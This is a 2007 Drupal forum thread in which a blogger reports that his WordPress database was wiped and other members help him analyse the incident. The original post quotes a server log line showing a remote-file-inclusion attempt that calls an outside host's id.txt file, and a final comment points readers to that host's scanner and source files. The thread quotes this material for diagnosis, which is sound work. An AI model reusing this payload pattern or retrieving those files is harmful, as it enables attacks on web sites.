Just letting everyone know... That my crap got hacked today.... This is was in the server logs at my host.

64.66.112.173 - - [17/Dec/2007:04:00:44 -0800] "GET /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt?

They were able to inject a malicious code into my wordpress SQL Database and remotely execute the code, which basically wiped out my wordpress SQL database. and they were able to cover their tracks very well...

I'm now sitting here wondering where I should even fucking bother continuing or not.

Wordpress guys say it's not their fault, they're blaming Drupal and I betcha the Drupal people will say it's Wordpresses fault.

I'm just having one of those "WTF?!?!?" Kinda days... Ya know?

-Chuck

Comments

vm’s picture

Language like that usually don't get you helped out at all, but I'll bite

what version of Drupal was in use ?

_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )

Christefano-oldaccount’s picture

Hey Chuck, I understand the feelings that come with something like this and the need to vent. It's okay with me if you want to vent but I don't think that swearing and predicting that people on drupal.org are going to blame WordPress is going to help. It may be hard, but please take a breath and try to relax.

If you want help analyzing the hack, please provide more information. It seems that you're using some version of D5 -- which point release? What version of WordPress were you using?

ChuckAdkins’s picture

I'm running the latest of Wordpress 2.3.1

Here's the drupal information:

Drupal 5.5
Configuration file Protected
Cron maintenance tasks Last run 28 min 52 sec ago
You can run cron manually.
Database schema Up to date
File system Writable (private download method)
MySQL database 5.0.45
PHP 5.2.5
Unicode library PHP Mbstring Extension
Web server Apache/2.0.61 (Unix) mod_ssl/2.0.61 OpenSSL/0.9.8b DAV/2 mod_mono/1.2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5

does that help?

vm’s picture

If you made backups are regular intervals you would have a way to recover.

Using Drupal 5.5 I don't see how this could occur. especially in a manner that would give a hacker access to the wordpress DB and not the Drupal DB. Though I won't say it's an impossibility.

That aside, the above information isn't all that is needed.

you would have to check your apache logs to figure out when this occured and do some backtracing.

you state that code was used and executed, what code was it ?

_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )

ChuckAdkins’s picture

I don't have direct access to those logs. according to what I was told my System Admin at Reseller Scene the injection happened on 17'th, why it choose to detonate today, I have no clue.

-Chuck

vm’s picture

without the specific information , I don't know how much can be done. If your host isn't provided that specific information, there really isn't any way for anyone to figure out what happened and how.

could you explain a bit about how your site was set up ?

wordpress and drupal, on subdomains ? in subdirectories ?

which program inside which program ?

where was the above injection occuring ? in which program ?

_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )

ChuckAdkins’s picture

I think you got an attitude problem... I don't need it.

see ya!

vm’s picture

yea, that makes complete sense.

because you and your host can't supply the necessary information to figure out what happened , its my fault.

keep this tidbit of information in mind, just because you see that message in your logs, doesn't at all mean that someone actually entered the site that way. it means they tried.

What can anyone do without specific information ?

_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )

Christefano-oldaccount’s picture

As far as I can tell, running Drupal 5.5 and WordPress 2.3 won't get you accused of running out of date versions. Did you have anything else running on your server? I did a quick search and saw that the bot that visited your site is interested in sites running Nuke and Joomla with certain plugins.

Do you have any third-party Drupal modules installed that were mentioned in any security announcements? (You do subscribe to them, right?)

I found your post at the WordPress support forum at http://wordpress.org/support/topic/149311 and you say that code that was injected on the 17th was executed today. It doesn't really work like that, though, and visiting a path like /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt wouldn't do anything but display node 2. If you have a backup anywhere, just check the content of node 2 to see if it had malicious code in it.

I can't recommend having regular backups strongly enough. There are very good modules like Backup and Migrate that will even do it for you. Have you contacted your hosting company to see if they have any backups of your database?

ChuckAdkins’s picture

I just lost my stuff and have no way to recover it.

anyhow...again I'm sorry..

eaton’s picture

64.66.112.173 - - [17/Dec/2007:04:00:44 -0800] "GET /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt?

They were able to inject a malicious code into my wordpress SQL Database and remotely execute the code, which basically wiped out my wordpress SQL database. and they were able to cover their tracks very well...

Wordpress guys say it's not their fault, they're blaming Drupal and I betcha the Drupal people will say it's Wordpresses fault.

Quite the self-fulfilling prophecy, unfortunately. I'm curious about the line that was listed in the logs: it appears to be an extremely common automated attack, an attempt to get sites to load a remote file for execution. It works on certain badly configured CMS's, but the URL in question wouldn't even do anything in Drupal: it would just give a 404 and complain. Drupal isn't designed to allow the loading of remote files for execution in the way that exploit requires. This is not to say that Drupal is perfect, just that the line listed above -- if it is indeed related to the attack that compromised your Wordpress DB -- doesn't appear to have any affect on Drupal.

When "the wordpress" guys said Drupal was at fault, did they give any other information or details? If a genuine security hole has been developed, we want to track it down as quickly as possible. With the information you've offered so far, though, there's no much to go on. The fact that the WP site was the one that was compromised makes the Drupal theory even stranger.

--
Lullabot! | Eaton's blog | VotingAPI discussion

--
Eaton — Partner at Autogram

ChuckAdkins’s picture

A few things...

1. I am not a expert when it comes to all this stuff. I'm an old school, Bulletin Board Sysop, FidoNet, MS-DOS, kind of a guy, who ended up in a Windows World. All this PHP, Drupal, CMS, Wordpress, PHP kind of stuff, you might as well be speaking in Japanese to me. I'm 35. not 17, okay? So, go easy on the old fogie eh?

2. I use Cpanel. I can fit on the end of thimble what I know about Unix and related stuff... I am however able to FTP updated stuff to my server... Harrumph! ;-P

3, I'm a writer/Opinionated old fogie/wanna be Political Pundit who wanted a way express my opinions about the stuff happening in Washington DC. and possibly make a little money in Advertising. So, far, I ain't rich, but I'm coming along... I just don't want the boat to sink in the process.

4. I tend to get short with people, It's a bad trait. My tact train jumped the tracks a long time ago. My ex-girlfriend used to always complain that I always sounded angry. But she sure did like my big 12 inch.....never mind, you get the picture...

I realize that unless I had shall access and could get ALL my logs, I could most likely figure out what happened, But I don't have shell access. Sucks, but hey, dem's the breaks, if I had more money than common sense, I'd pay for some dedicated hosted WITH SHELL access. But I'm short on both, so, What's a guy to do? (no cracks now...hehehe)

If I came off as a, as they say in Spanish, A Bondayho... I apologize, I just know that I got on my blog today, and everything was gone. I was able to recover some, but not all, problem was, from what Reseller scene told me. That all the backups were infected too. that's why data recovery was not possible. But as they say in New York, Dem's the Breaks.

Hopefully, you all can see where I'm coming from a little more.

on a Brighter note, I do like Drupal, It does have a good number of features. half of which I'll never use. I just wish I could find a theme that is better suited to me. But what I'm running is nice.

-Chuck

vm’s picture

I'm 37 not 17, which i guess makes me an older fogie.

You don't need shell access to get logs. Your host restricting your access to them for one reason or another. That coupled with the fact that your host just doesn't seem to be working with you at all in this makes me raise an eyebrow.

_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )

ChuckAdkins’s picture

You don't need shell access to get logs. Your host restricting your access to them for one reason or another. That coupled with the fact that your host just doesn't seem to be working with you at all in this makes me raise an eyebrow.

I was able to look at the raw logs for today, I just don't archive them. I do have stat programs over there, let's see here...:

I've got Latest visitors, webalizer, Raw access logs, (but I didn't have the archive feature enabled...), Analog Stats, Awstats... I asked resellerscene for the complete long for the 17'th But they just sent me that one line...

problem is, the logs are in hex code, which made zero sense to me.

-C

eaton’s picture

Chuck, no disclaimers necessary. I definitely understand that it can be baffling, frustrating, and more than a bit unsettling when this kind of thing happens. Shell access shouldn't be necessary to get logs, a good ISP or hosting provider should be able to get them, but it sounds like there was complication with that.

I can say that if the WordPress DB was the one that was wiped, it was most certainly the WordPress installation that was compromised. The appearance of the url with 'node' in it in the logs somewhere is likely an artifact of the script that was out there pounding every CMS in the universe, using goofy URLs to convince the CMS's to load a file from another web server and run it.

Again, this is not to imply that there is some security hole in the baseline wordpress installation, just that if Drupal had been compromised, ITS database would likely have been wiped and/or corrupted. There's not much more we can offer without information in the log files from the ISP, but I hope that we can help in some way.

--
Lullabot! | Eaton's blog | VotingAPI discussion

--
Eaton — Partner at Autogram

ChuckAdkins’s picture

Chuck, no disclaimers necessary. I definitely understand that it can be baffling, frustrating, and more than a bit unsettling when this kind of thing happens. Shell access shouldn't be necessary to get logs, a good ISP or hosting provider should be able to get them, but it sounds like there was complication with that.

yeah, especially seeing I had a kick tail set up....

But no worries...

kxerc’s picture

I'm just inserting here to ask a question myself. You say that if bad code were inserted via Drupal, Drupal would then likely eat its own database and not WP. This makes sense, but if the user and pass for both databases (WP and Drupal) were the same, or worse yet the user and pass had root permissions, maybe an inventive hack could simply wipe everything from the root? And/or if WP and Drupal were installed within the same database, could some code not simply wipe out or scramble every table? I'm not expert enough here to know, and I've never used WP, but I'm curious to improve my own sites security.

ChuckAdkins’s picture

Drupal and Wordpress use two totally different SQL databases, THANK YOU BABY JESUS!

;-)

as for my permissions, I had them set where they're supposed to be. Thankfully.

passwords were different in various places.

-C

jefjulie’s picture

if you go to http://gw-gold.net/ it has some web interface that appears to be the scanner they used. the source files are in http://gw-gold.net/xpl/

i dont have the time to look at these right now, but i am sure they might be able to at least help you avoid this in the future.